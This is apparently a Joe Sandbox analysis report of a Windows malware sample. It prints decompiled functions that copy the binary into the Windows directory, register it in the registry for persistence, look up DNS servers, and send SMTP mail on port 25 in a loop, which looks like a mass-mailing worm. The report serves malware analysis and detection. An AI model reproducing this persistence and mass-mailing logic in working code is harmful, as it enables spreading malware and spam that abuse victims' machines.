Function 005E014F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 115memorywindowCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1000128F,00001000,00000040,005E02BE,?,?,?,?,0000001C,0000001C), ref: 005E01D3
wsprintfA.USER32 ref: 005E0242
wsprintfA.USER32 ref: 005E0261
MessageBoxA.USER32(00000000,005E085B,Entry Point Not Found,00000010), ref: 005E0279
ExitProcess.KERNEL32(00000001,?,?,?,?,0000001C,0000001C), ref: 005E0281
VirtualFree.KERNELBASE(00760000,00000000,00008000,SQRWVU,SQRWVU,SQRWVU,?,?,?,?,0000001C,0000001C), ref: 005E029C

Strings

The ordinal %d could not be located in the dynamic link library %s., xrefs: 005E023A
The procedure entry point %s could not be located in the dynamic link library %s., xrefs: 005E0259
[any], xrefs: 005E0252
SQRWVU, xrefs: 005E01DB, 005E01E1, 005E01E7, 005E01ED, 005E0202
Entry Point Not Found, xrefs: 005E026F

Memory Dump Source

Source File: 00000000.00000003.298323919.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5e0000_ .jbxd

Similarity

API ID: Virtualwsprintf$AllocExitFreeMessageProcess
String ID: Entry Point Not Found$SQRWVU$The ordinal %d could not be located in the dynamic link library %s.$The procedure entry point %s could not be located in the dynamic link library %s.$[any]
API String ID: 81942880-1410871612
Opcode ID: ff9455d2897b091cda98db5d8d6b0dcf280fd5aac371be2e3536bd5b1e227d4c
Instruction ID: aafee33c41dbd77cfce878e04fb0b7869b9410cd3adbfc9670fdccad31b9c842
Opcode Fuzzy Hash: ff9455d2897b091cda98db5d8d6b0dcf280fd5aac371be2e3536bd5b1e227d4c
Instruction Fuzzy Hash: BA416C762007869FDB38DF59CC85BEB77A9BF88340F044119EE8AD3694DB70A960CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402FC3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00402FC3(void* __edx, void* __eflags, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				char _v1504;
				char _v3004;
				void* _t24;
				void* _t31;
				void* _t32;
				void* _t34;
				void* _t37;
				void* _t45;
				CHAR* _t50;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;

				GetModuleFileNameA(0,  &_v3004, 0x5dc);
				_t50 = _a8;
				GetWindowsDirectoryA(_t50, 0x5dc);
				if( *((char*)(E00403AA0(_t50) + _t50 - 1)) != 0x5c) {
					E004039C0(_t50, 0x409704);
				}
				E004039C0(_t50, _a4);
				GetWindowsDirectoryA( &_v1504, 0x5dc);
				_t24 = E00403AA0( &_v1504);
				_pop(_t45);
				if( *((char*)(_t55 + _t24 - 0x5dd)) != 0x5c) {
					E004039C0( &_v1504, 0x409704);
					_pop(_t45);
				}
				E004039C0( &_v1504, "pk_zip_alg.log");
				E004017AD(_t45,  &_v3004,  &_v1504, _a12); // executed
				_t31 =  *0x407044( &_v1504, 0); // executed
				_t53 = _t31; // executed
				_t32 =  *0x407084(_t50, 0); // executed
				_t51 = _t32;
				if(_t53 == 0xffffffff || _t51 == 0xffffffff) {
					L8:
					return 0;
				} else {
					_t34 = E004030C4(_t53, _t51, 0x48); // executed
					if(_t34 == 0xffffffff) {
						goto L8;
					}
					_t54 =  *0x407038; // executed
					 *_t54(_t53); // executed
					 *_t54(_t51);
					_t37 = 1;
					return _t37;
				}
			}

0x00402fde
0x00402fe4
0x00402fef
0x00402ffd
0x00403005
0x0040300b
0x00403010
0x0040301f
0x00403028
0x00403035
0x00403036
0x00403044
0x0040304a
0x0040304a
0x00403057
0x0040306d
0x0040307e
0x00403087
0x00403089
0x00403092
0x00403094
0x004030bd
0x00000000
0x0040309b
0x0040309f
0x004030aa
0x00000000
0x00000000
0x004030ad
0x004030b3
0x004030b6
0x004030ba
0x00000000
0x004030ba

APIs

GetModuleFileNameA.KERNEL32(00000000,?,000005DC,lkakbmheeezqnv@rkfww.uwa,00000000), ref: 00402FDE
GetWindowsDirectoryA.KERNEL32(00000000,000005DC), ref: 00402FEF
GetWindowsDirectoryA.KERNEL32(?,000005DC), ref: 0040301F
_lopen.KERNEL32(?,00000000), ref: 0040307E
_lcreat.KERNEL32(00000000,00000000), ref: 00403089
_lclose.KERNEL32(00000000), ref: 004030B3
_lclose.KERNEL32(00000000), ref: 004030B6

Strings

lkakbmheeezqnv@rkfww.uwa, xrefs: 00402FD3
pk_zip_alg.log, xrefs: 00403051
\, xrefs: 0040302D

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: DirectoryWindows_lclose$FileModuleName_lcreat_lopen
String ID: \$lkakbmheeezqnv@rkfww.uwa$pk_zip_alg.log
API String ID: 418247854-830633303
Opcode ID: 5fb2589541b04e35ebe5c7817b14acacc521f80986c20e123d9fd41e0fdc9b4c
Instruction ID: 893d3cb19f408373a2294435253bcb47e76fc05a7174a4a21b03a33dcbd5f7a6
Opcode Fuzzy Hash: 5fb2589541b04e35ebe5c7817b14acacc521f80986c20e123d9fd41e0fdc9b4c
Instruction Fuzzy Hash: D621B172805215AADB30AA649C45F9F7F6C9B01726F1001BBF514B31D1EB7CAA448E69

Uniqueness

Uniqueness Score: -1.00%

Function 0040320E Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87
registryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0040320E(void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v264;
				char _v1796;
				char _v3296;
				void* _t59;

				GetModuleFileNameA(0,  &_v3296, 0x5dc);
				GetWindowsDirectoryA( &_v1796, 0x5dc);
				if( *((char*)(_t59 + E00403AA0( &_v1796) - 0x701)) != 0x5c) {
					E004039C0( &_v1796, 0x409704);
				}
				_push(0);
				_push( *0x4090ec);
				E00401BAD( &_v264);
				E004039C0( &_v1796,  &_v264);
				if(_a4 != 0) {
					CopyFileA( &_v3296,  &_v1796, 0); // executed
				}
				E00401BAD( &_v264);
				RegOpenKeyA(0x80000002,  &_v264,  &_v8); // executed
				 *0x407034( &_v264, 0x5c99a4, "NCLOTJXF\Hbupwzwvi\Tbmqwoz\WcppnmiVnpzbwm\Xcm", 0);
				_push(0);
				_push( *0x4090f0);
				E00401BAD( &_v264);
				RegSetValueExA(_v8,  &_v264, 0, 1,  &_v1796, E00403AA0( &_v1796)); // executed
				return RegCloseKey(_v8);
			}

0x00403229
0x00403237
0x00403252
0x00403260
0x00403266
0x00403267
0x0040326e
0x00403275
0x00403288
0x00403293
0x004032a4
0x004032a4
0x004032b7
0x004032cf
0x004032e1
0x004032e7
0x004032ee
0x004032f5
0x0040331e
0x00403330

APIs

GetModuleFileNameA.KERNEL32(00000000,?,000005DC,00000000), ref: 00403229
GetWindowsDirectoryA.KERNEL32(?,000005DC), ref: 00403237
CopyFileA.KERNEL32(?,?,00000000), ref: 004032A4
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 004032CF
lstrcpy.KERNEL32(?,005C99A4), ref: 004032E1
RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000000), ref: 0040331E
RegCloseKey.ADVAPI32(?), ref: 00403327

Strings

NCLOTJXF\Hbupwzwvi\Tbmqwoz\WcppnmiVnpzbwm\Xcm, xrefs: 004032B1
\, xrefs: 00403249

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: File$CloseCopyDirectoryModuleNameOpenValueWindowslstrcpy
String ID: NCLOTJXF\Hbupwzwvi\Tbmqwoz\WcppnmiVnpzbwm\Xcm$\
API String ID: 1978836261-3930392925
Opcode ID: 5a97ee3694a09d80efa63ec80c60893b9d873654eb98aa9f412b687097bd7f15
Instruction ID: bd3c018b4c466b147e1f3240e3f220260f15c5d7967e5d602c5e00585b81fb41
Opcode Fuzzy Hash: 5a97ee3694a09d80efa63ec80c60893b9d873654eb98aa9f412b687097bd7f15
Instruction Fuzzy Hash: 40310EB6C0411CEBDB119BA0DD89EEA777CEB04315F0405B7B209F2051E678AA448FA5

Uniqueness

Uniqueness Score: -1.00%

Function 004022EC Relevance: 15.2, APIs: 10, Instructions: 199
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 33%

			E004022EC(intOrPtr _a4) {
				char _v8;
				char _v12;
				intOrPtr _v24;
				short _v26;
				char _v28;
				signed int _v92;
				void _v154;
				char _v156;
				void _v282;
				char _v284;
				char _v540;
				char _v796;
				char _v1052;
				char _v2452;
				signed int _t71;
				void* _t82;
				short _t88;
				char _t89;
				void* _t94;
				signed int _t97;
				signed int _t99;
				void* _t110;
				void* _t115;
				void* _t120;
				intOrPtr _t123;
				void* _t130;
				signed int _t132;
				signed int _t140;
				signed int _t141;
				short _t144;
				intOrPtr* _t151;
				void* _t152;
				intOrPtr* _t154;
				intOrPtr _t155;
				intOrPtr* _t156;
				signed int _t157;
				void* _t158;
				void* _t160;

				_t71 = E00401BE1();
				asm("cdq");
				_t154 =  *0x407034;
				 *_t154( &_v540,  *((intOrPtr*)(0x40a410 + _t71 %  *0x5c9984 * 4)));
				_t144 =  *0x5c99a4; // 0x1374
				_t132 = 0x1f;
				_v284 = _t144;
				memset( &_v282, 0, _t132 << 2);
				asm("stosw");
				_push(0xf);
				_v156 = _t144;
				_push(_a4);
				memset( &_v154, 0, 0 << 2);
				_t160 = _t158 + 0x18;
				_v92 = _v92 & 0x00000000;
				_v12 = 0x2af8;
				asm("stosw");
				_t151 =  *0x407024;
				_t130 = 0;
				if( *_t151() <= 0) {
					L6:
					if(_v92 == 0) {
						L17:
						__eflags = 0;
						return 0;
					}
					_t82 = E0040156C( &_v92); // executed
					_t152 = _t82;
					if(_t152 == 0) {
						goto L17;
					}
					_t28 = _t152 + 4; // 0x4
					_t155 = E0040253F(_t28);
					E00403E54(_t152);
					if(_t155 == 0) {
						goto L17;
					}
					E00403600( &_v28, 0, 0x10);
					_v28 = 2;
					_t88 =  *0x407168(0x19);
					_v26 = _t88;
					_v24 = _t155;
					_t89 =  *0x407178(2, 1, 6); // executed
					_v8 = _t89;
					if(_t89 == 0xffffffff) {
						goto L17;
					}
					_t156 =  *0x40717c;
					 *_t156(_t89, 0xffff, 0x1006,  &_v12, 4); // executed
					 *_t156(_v8, 0xffff, 0x1005,  &_v12, 4); // executed
					_t94 =  *0x40715c(_v8,  &_v28, 0x10); // executed
					if(_t94 != 0xffffffff) {
						_t97 = E00401BE1();
						asm("cdq");
						_t140 = 8;
						_push(0);
						_t157 = _t97 % _t140;
						_t99 = E00401BE1();
						asm("cdq");
						_t141 = 5;
						_t146 = _t99 % _t141;
						_push( *((intOrPtr*)(0x40917c + _t99 % _t141 * 4)));
						E00401BAD( &_v796);
						_push(0);
						_push( *((intOrPtr*)(0x409190 + _t157 * 4)));
						E00401BAD( &_v2452);
						_push(0);
						_push( *((intOrPtr*)(0x4091b0 + _t157 * 4)));
						E00401BAD( &_v1052);
						_t110 = E00402A92( &_v8,  &_v92,  &_v540, _a4); // executed
						_t173 = _t110;
						if(_t110 != 0) {
							_t115 = E0040257A(_t146, _t173,  &_v8,  &_v540, _a4,  &_v796,  &_v284); // executed
							_t174 = _t115;
							if(_t115 != 0) {
								_t120 = E004028E2(_t174,  &_v8,  &_v284,  &_v2452,  &_v1052, _t157); // executed
								if(_t120 != 0) {
									E00402C82( &_v8); // executed
								}
							}
						}
						_push(1);
						_pop(0);
					}
					 *0x40718c(_v8);
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t123 = _a4;
					if( *((char*)(_t130 + _t123)) == 0x40) {
						break;
					}
					_push(_t123);
					_t130 = _t130 + 1;
					if(_t130 <  *_t151()) {
						continue;
					} else {
						goto L6;
					}
				}
				_t21 = _t123 + 1; // 0x1
				 *_t154( &_v92, _t130 + _t21);
				__eflags = _v92;
				if(_v92 == 0) {
					goto L17;
				}
				E00403CD0( &_v156, _a4, _t130);
				_t160 = _t160 + 0xc;
				goto L6;
			}

0x004022f8
0x004022fd
0x00402304
0x00402318
0x0040231a
0x00402323
0x0040232c
0x00402333
0x00402335
0x00402337
0x00402342
0x00402349
0x0040234c
0x0040234c
0x0040234e
0x00402352
0x00402359
0x0040235b
0x00402361
0x00402367
0x004023a4
0x004023a8
0x00402538
0x00402538
0x00000000
0x00402538
0x004023b2
0x004023b7
0x004023be
0x00000000
0x00000000
0x004023c4
0x004023ce
0x004023d0
0x004023d9
0x00000000
0x00000000
0x004023e6
0x004023ee
0x004023f6
0x00402402
0x00402406
0x00402409
0x00402412
0x00402415
0x00000000
0x00000000
0x0040241b
0x00402433
0x00402444
0x0040244f
0x00402458
0x0040245e
0x00402465
0x00402466
0x00402469
0x0040246a
0x0040246c
0x00402473
0x00402474
0x00402475
0x0040247d
0x00402485
0x0040248a
0x00402491
0x00402499
0x0040249e
0x004024a5
0x004024ad
0x004024c4
0x004024cc
0x004024ce
0x004024ec
0x004024f4
0x004024f6
0x00402512
0x0040251c
0x00402522
0x00402527
0x0040251c
0x004024f6
0x00402528
0x0040252a
0x0040252a
0x0040252e
0x00000000
0x00000000
0x00000000
0x00000000
0x00402369
0x00402369
0x00402369
0x00402370
0x00000000
0x00000000
0x00402372
0x00402373
0x00402378
0x00000000
0x0040237a
0x00000000
0x0040237a
0x00402378
0x0040237c
0x00402385
0x00402387
0x0040238b
0x00000000
0x00000000
0x0040239c
0x004023a1
0x00000000

APIs

lstrcpy.KERNEL32(?,0056DB90), ref: 00402318
lstrlen.KERNEL32(?), ref: 00402363
lstrlen.KERNEL32(00002AF8), ref: 00402374
lstrcpy.KERNEL32(00000000,00000001), ref: 00402385
htons.WS2_32(00000019), ref: 004023F6
socket.WS2_32(00000002,00000001,00000006), ref: 00402409
setsockopt.WS2_32(00000000,0000FFFF,00001006,00002AF8,00000004), ref: 00402433
setsockopt.WS2_32(?,0000FFFF,00001005,00002AF8,00000004), ref: 00402444
connect.WS2_32(?,00000002,00000010), ref: 0040244F
closesocket.WS2_32(?), ref: 0040252E

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: lstrcpylstrlensetsockopt$closesocketconnecthtonssocket
String ID:
API String ID: 1273905230-0
Opcode ID: f4583e0e512642c25c6fdd668f75a5ea1e1d88c4a511dab96a24029a40f8b1c4
Instruction ID: d286795982486a818a567e55f63cc13e73faccbcf46e7c85a19e6ca416581e4f
Opcode Fuzzy Hash: f4583e0e512642c25c6fdd668f75a5ea1e1d88c4a511dab96a24029a40f8b1c4
Instruction Fuzzy Hash: E06180B290020CBADB119BE4DD89FDF777CAF04304F100577F605B61D1EAB99A858BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402A92 Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00402A92(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v260;
				void* _t21;
				void* _t26;
				void* _t30;
				void* _t34;
				void* _t38;
				void* _t42;
				void* _t43;
				void* _t49;
				void* _t50;

				_t21 = E00402BBB(0, _a4); // executed
				if(_t21 < 0xc8 || _t21 >= 0x190) {
					L13:
					return 0;
				} else {
					_push(_a8);
					wsprintfA( &_v260, "EHLO %s");
					_t26 = E00402BBB( &_v260, _a4); // executed
					_t50 = _t49 + 0x14;
					if(_t26 < 0xc8 || _t26 > 0x12b) {
						_push(_a8);
						wsprintfA( &_v260, "HELO %s");
						_t30 = E00402BBB( &_v260, _a4);
						_t50 = _t50 + 0x14;
						if(_t30 < 0xc8 || _t30 > 0x12b) {
							goto L13;
						} else {
							goto L6;
						}
					} else {
						L6:
						_push(_a12);
						wsprintfA( &_v260, "MAIL FROM:<%s>");
						_t34 = E00402BBB( &_v260, _a4); // executed
						if(_t34 < 0xc8 || _t34 > 0x12b) {
							goto L13;
						} else {
							_push(_a16);
							wsprintfA( &_v260, "RCPT TO:<%s>");
							_t38 = E00402BBB( &_v260, _a4); // executed
							if(_t38 < 0xc8 || _t38 > 0x12b) {
								goto L13;
							} else {
								E004039B0( &_v260, "DATA");
								_t42 = E00402BBB( &_v260, _a4); // executed
								if(_t42 < 0xc8 || _t42 > 0x18f) {
									goto L13;
								} else {
									_t43 = 1;
									return _t43;
								}
							}
						}
					}
				}
			}

0x00402aa3
0x00402ab1
0x00402bb4
0x00000000
0x00402ac2
0x00402ac2
0x00402ad7
0x00402ae3
0x00402ae8
0x00402af2
0x00402af8
0x00402b07
0x00402b13
0x00402b18
0x00402b1d
0x00000000
0x00000000
0x00000000
0x00000000
0x00402b2b
0x00402b2b
0x00402b2b
0x00402b3a
0x00402b46
0x00402b50
0x00000000
0x00402b56
0x00402b56
0x00402b65
0x00402b71
0x00402b7b
0x00000000
0x00402b81
0x00402b8d
0x00402b9c
0x00402ba6
0x00000000
0x00402baf
0x00402bb1
0x00000000
0x00402bb1
0x00402ba6
0x00402b7b
0x00402b50
0x00402af2

APIs

Part of subcall function 00402BBB: send.WS2_32(0000FFFF,00000000,00000000,00000000), ref: 00402BE1
Part of subcall function 00402BBB: recv.WS2_32(0000FFFF,?,00000001,00000000), ref: 00402C15

wsprintfA.USER32 ref: 00402AD7
wsprintfA.USER32 ref: 00402B07
wsprintfA.USER32 ref: 00402B3A
wsprintfA.USER32 ref: 00402B65

Strings

HELO %s, xrefs: 00402B01
EHLO %s, xrefs: 00402AD1
RCPT TO:<%s>, xrefs: 00402B5F
DATA, xrefs: 00402B87
MAIL FROM:<%s>, xrefs: 00402B34

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: wsprintf$recvsend
String ID: DATA$EHLO %s$HELO %s$MAIL FROM:<%s>$RCPT TO:<%s>
API String ID: 975075462-4026668637
Opcode ID: 8fed2b6a537aceff4558e0c98919400f1356edc141d2c366121c7beef8aed380
Instruction ID: 9ef6291a36c4d81be2c975a916363869286bfb9255701f82f8d90106a32f8625
Opcode Fuzzy Hash: 8fed2b6a537aceff4558e0c98919400f1356edc141d2c366121c7beef8aed380
Instruction Fuzzy Hash: 0A316D7190011D6ACF226E55CD89ECE3738BB04708F1408BBF944F21D2E5F9E7948BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040156C Relevance: 10.6, APIs: 7, Instructions: 108
memorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040156C(void* _a4) {
				intOrPtr* _v8;
				long _v12;
				void _v2059;
				signed char _v2060;
				long* _t29;
				long* _t30;
				void* _t36;
				void* _t41;
				void* _t48;
				void* _t57;
				void* _t61;
				void* _t63;
				void* _t64;

				_v2060 = _v2060 & 0x00000000;
				memset( &_v2059, 0, 0x1ff << 2);
				_t64 = _t63 + 0xc;
				asm("stosw");
				asm("stosb");
				_t48 = GlobalAlloc(0x40, 0x248);
				_t29 =  &_v12;
				_push(_t29);
				_push(_t48);
				_v12 = 0x248;
				L004035F8(); // executed
				if(_t29 == 0x6f) {
					GlobalFree(_t48);
					_t48 = GlobalAlloc(0x40, _v12);
				}
				_t30 =  &_v12;
				_push(_t30);
				_push(_t48); // executed
				L004035F8(); // executed
				if(_t30 != 0) {
					_t61 = _a4;
					goto L9;
				} else {
					_t10 = _t48 + 0x110; // 0x110
					_t41 = E004010A4(_a4, _t10, 0x35, 0xf,  &_v2060); // executed
					_t57 = _t41;
					_t64 = _t64 + 0x14;
					if(_t57 != 0) {
						_t61 = _a4;
						L14:
						if(_t61 != 0) {
							GlobalFree(_t61); // executed
						}
						if(_t48 != 0) {
							GlobalFree(_t48);
						}
						if(_t57 <= 0) {
							return 0;
						} else {
							_t36 = E00401335( &_v2060); // executed
							return _t36;
						}
					}
					_t61 =  *(_t48 + 0x10c);
					while(_t61 != 0) {
						_t57 = E004010A4(_a4, _t61 + 4, 0x35, 0xf,  &_v2060);
						_t64 = _t64 + 0x14;
						if(_t57 != 0) {
							goto L14;
						}
						_t61 =  *_t61;
					}
					L9:
					_v8 = 0x409030;
					while(1) {
						_t57 = E004010A4(_a4,  *_v8, 0x35, 0xf,  &_v2060);
						_t64 = _t64 + 0x14;
						if(_t57 != 0) {
							goto L14;
						}
						_v8 = _v8 + 4;
						if(_v8 < 0x409094) {
							continue;
						}
						goto L14;
					}
					goto L14;
				}
			}

0x00401575
0x00401591
0x00401591
0x00401593
0x00401595
0x004015a1
0x004015a3
0x004015a6
0x004015a7
0x004015a8
0x004015ab
0x004015b3
0x004015b6
0x004015c3
0x004015c3
0x004015c5
0x004015c8
0x004015c9
0x004015ca
0x004015d1
0x00401624
0x00000000
0x004015d3
0x004015dc
0x004015e8
0x004015ed
0x004015ef
0x004015f4
0x0040165e
0x00401661
0x00401663
0x00401666
0x00401666
0x0040166e
0x00401671
0x00401671
0x0040167c
0x00401690
0x0040167e
0x00401685
0x0040168c
0x0040168c
0x0040167c
0x004015f6
0x004015fc
0x00401617
0x00401619
0x0040161e
0x00000000
0x00000000
0x00401620
0x00401620
0x00401627
0x00401627
0x0040162e
0x00401646
0x00401648
0x0040164d
0x00000000
0x00000000
0x0040164f
0x0040165a
0x00000000
0x00000000
0x00000000
0x0040165c
0x00000000
0x0040162e

APIs

GlobalAlloc.KERNEL32(00000040,00000248,76686980,766C8170,00000000), ref: 0040159F
GetNetworkParams.IPHLPAPI(00000000,004023B7), ref: 004015AB
GlobalFree.KERNEL32(00000000), ref: 004015B6
GlobalAlloc.KERNEL32(00000040,004023B7), ref: 004015C1
GetNetworkParams.IPHLPAPI(00000000,004023B7), ref: 004015CA
GlobalFree.KERNELBASE(004023B7), ref: 00401666
GlobalFree.KERNEL32(00000000), ref: 00401671

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Global$Free$AllocNetworkParams
String ID:
API String ID: 827914268-0
Opcode ID: b14003d5a7d423da7641136c3f02da54da59401a866e867eda0f51fbb08adce0
Instruction ID: 85184617768d1cf1f4d1549497506ff95158cac55b633c5c2769b379f4904e23
Opcode Fuzzy Hash: b14003d5a7d423da7641136c3f02da54da59401a866e867eda0f51fbb08adce0
Instruction Fuzzy Hash: F7310672900204BBCB119EA0CC45FEA77ACAF40750F084076FA45F72A1DB799E849B95

Uniqueness

Uniqueness Score: -1.00%

Function 004053C8 Relevance: 6.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,00000060,?,00000000), ref: 004053F0
RtlAllocateHeap.NTDLL(00000008,000041C4), ref: 00405424
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00000000,00405190,?,?,?,00000100,?,00000000), ref: 0040543E
HeapFree.KERNEL32(00000000,?,?,00000000,00405190,?,?,?,00000100,?,00000000), ref: 00405455

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Heap$Allocate$AllocFreeVirtual
String ID:
API String ID: 94566200-0
Opcode ID: 8f23c1b76fe73015be8243e4f29861cf5ad65d87f33b9b22c861c89e081dfc9f
Instruction ID: 98c845e8108cdbb28b2af26b07fa77288835e54d7b3a4ddf19cd1ca82e880c77
Opcode Fuzzy Hash: 8f23c1b76fe73015be8243e4f29861cf5ad65d87f33b9b22c861c89e081dfc9f
Instruction Fuzzy Hash: 42118F30200A01DFC7219F18EC49EA27BB2FBA57217514A2AF157E71F1C771A889EF95

Uniqueness

Uniqueness Score: -1.00%

Function 00402268 Relevance: 6.0, APIs: 4, Instructions: 47
sleepnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402268() {
				long _v4;
				long _v12;
				intOrPtr* _v16;
				intOrPtr _v24;
				int _t12;
				int _t14;
				signed char _t16;
				int _t19;
				signed int* _t20;
				void* _t21;
				void* _t24;
				void* _t29;

				while(1) {
					L1:
					Sleep(0x32); // executed
					_v4 = _v4 & 0x00000000;
					_t12 = InternetGetConnectedState( &_v4, 0); // executed
					_t19 = _t12;
					if(_t19 == 0) {
						continue;
					}
					L2:
					_t21 = 0;
					_t24 =  *0x5c9984 - _t21; // 0x66
					if(_t24 > 0) {
						_v16 = 0x40a410;
						while(_t19 == 1) {
							_t6 = _t21 + 0x56db90; // 0x56db90
							_t20 = _t6;
							if( *(_t21 + 0x56db90) == 0) {
								 *_t20 = 1;
								_t16 = E004022EC( *_v16); // executed
								if(_t16 == 0) {
									 *_t20 =  *_t20 & _t16;
								}
							}
							_t14 = InternetGetConnectedState( &_v12, 0); // executed
							_t19 = _t14; // executed
							Sleep(0x32); // executed
							_t21 = _t21 + 1;
							_v24 = _v24 + 4;
							_t29 = _t21 -  *0x5c9984; // 0x66
							if(_t29 < 0) {
								continue;
							} else {
								while(1) {
									L1:
									Sleep(0x32); // executed
									_v4 = _v4 & 0x00000000;
									_t12 = InternetGetConnectedState( &_v4, 0); // executed
									_t19 = _t12;
									if(_t19 == 0) {
										continue;
									}
									goto L2;
									do {
										goto L1;
									} while (_t19 == 0);
									goto L2;
								}
							}
						}
					}
					L1:
					Sleep(0x32); // executed
					_v4 = _v4 & 0x00000000;
					_t12 = InternetGetConnectedState( &_v4, 0); // executed
					_t19 = _t12;
				}
			}

0x0040227a
0x0040227a
0x0040227c
0x0040227e
0x0040228a
0x0040228c
0x00402290
0x00000000
0x00000000
0x00402292
0x00402292
0x00402294
0x0040229a
0x0040229c
0x004022a4
0x004022b0
0x004022b0
0x004022b6
0x004022bc
0x004022c1
0x004022c9
0x004022cb
0x004022cb
0x004022c9
0x004022d4
0x004022d8
0x004022da
0x004022dc
0x004022dd
0x004022e2
0x004022e8
0x00000000
0x004022ea
0x0040227a
0x0040227a
0x0040227c
0x0040227e
0x0040228a
0x0040228c
0x00402290
0x00000000
0x00000000
0x00000000
0x0040227a
0x00000000
0x00000000
0x00000000
0x0040227a
0x0040227a
0x004022e8
0x004022a4
0x0040227a
0x0040227c
0x0040227e
0x0040228a
0x0040228c
0x0040228e

APIs

Sleep.KERNELBASE(00000032), ref: 0040227C
InternetGetConnectedState.WININET(00000000,00000000), ref: 0040228A
InternetGetConnectedState.WININET(00000000,00000000), ref: 004022D4
Sleep.KERNELBASE(00000032), ref: 004022DA

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

